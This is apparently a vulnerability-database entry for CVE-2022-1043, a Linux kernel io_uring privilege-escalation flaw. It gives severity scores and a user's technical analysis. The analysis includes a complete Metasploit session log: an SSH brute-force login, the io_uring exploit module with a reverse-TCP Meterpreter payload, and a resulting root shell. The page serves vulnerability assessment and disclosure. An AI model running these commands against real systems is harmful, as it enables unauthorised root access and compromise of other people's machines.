Attacker Value
Low
(1 user assessed)
Exploitability
Moderate
(1 user assessed)
User Interaction
None
Privileges Required
Low
Attack Vector
Local
1

CVE-2022-1043

Disclosure Date: August 29, 2022
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Privilege Escalation
Techniques
Validation
Validated

Description

A flaw was found in the Linux kernel’s io_uring implementation. This flaw allows an attacker with a local account to corrupt system memory, crash the system or escalate privileges.

Add Assessment

1
Ratings
Technical Analysis

Description

This vulnerability exists in linux kernel’s io_uring implementation. This vuln allows an attacker with a local account to corrupt system memory, crash the system or escalate privileges in order to spawn a root shell.

Attacker Value & Exploitation

Github user, @jvoisin explained, user @minipli-oss, wrote a neat exploit for CVE-2022-1043, and it has the following advantages over your everyday Linux LPE:

  • No hardcoded offsets
  • No ROP
  • Architecture-agnostic-ish
  • Bypasses all existing mitigations, even out-of-kernel-ones like grsecurity (for version older than the exploit of course, since this class of vulnerabilities is now mitigated there) and LKRG.

The only drawback is that it only works on v5.12-rc3 to v5.14-rc7 a fairly small subset of the linux kernel.

If the system is vulnerable, exploitation is trivial. The neat, aforementioned exploit has been integrated into the Metasploit making getting a root shell a piece of cake:

msf6 auxiliary(scanner/ssh/ssh_login) > run rhosts=172.16.199.132 username=msfuser password=notpassword

[*] 172.16.199.132:22 - Starting bruteforce
[+] 172.16.199.132:22 - Success: 'msfuser:notpassword' 'uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare) Linux msfuser-virtual-machine 5.13.12-051312-generic #202108180838 SMP Wed Aug 18 08:41:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux '
[*] SSH session 1 opened (172.16.199.1:60829 -> 172.16.199.132:22) at 2023-02-01 10:59:16 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > use linux/local/cve_2022_1043_io_uring_priv_esc
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2022_1043_io_uring_priv_esc) > set session 1
session => 1
msf6 exploit(linux/local/cve_2022_1043_io_uring_priv_esc) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(linux/local/cve_2022_1043_io_uring_priv_esc) > set lport 4447
lport => 4447
msf6 exploit(linux/local/cve_2022_1043_io_uring_priv_esc) > run

[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture:
[*] Started reverse TCP handler on 172.16.199.1:4447
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. > 1 CPU required, detected: 2
[*] Writing '/tmp/.5Z1IxJt0' (282 bytes) ...
[*] Launching exploit...
[*] Sending stage (3045348 bytes) to 172.16.199.132
[+] Deleted /tmp/.5Z1IxJt0
[+] Deleted /tmp/.qfp5AH76BB
[*] Meterpreter session 2 opened (172.16.199.1:4447 -> 172.16.199.132:49236) at 2023-02-01 10:59:51 -0500

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.16.199.132
OS           : Ubuntu 22.04 (Linux 5.13.12-051312-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

Defensive Suggestions

Not much to say here other don’t run a vulnerable kernel version, patch!

CVSS V3 Severity and Metrics
Base Score:
8.8 High
Impact Score:
6
Exploitability Score:
2
Vector:
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Attack Vector (AV):
Local
Attack Complexity (AC):
Low
Privileges Required (PR):
Low
User Interaction (UI):
None
Scope (S):
Changed
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • linux

Products

  • linux kernel
Technical Analysis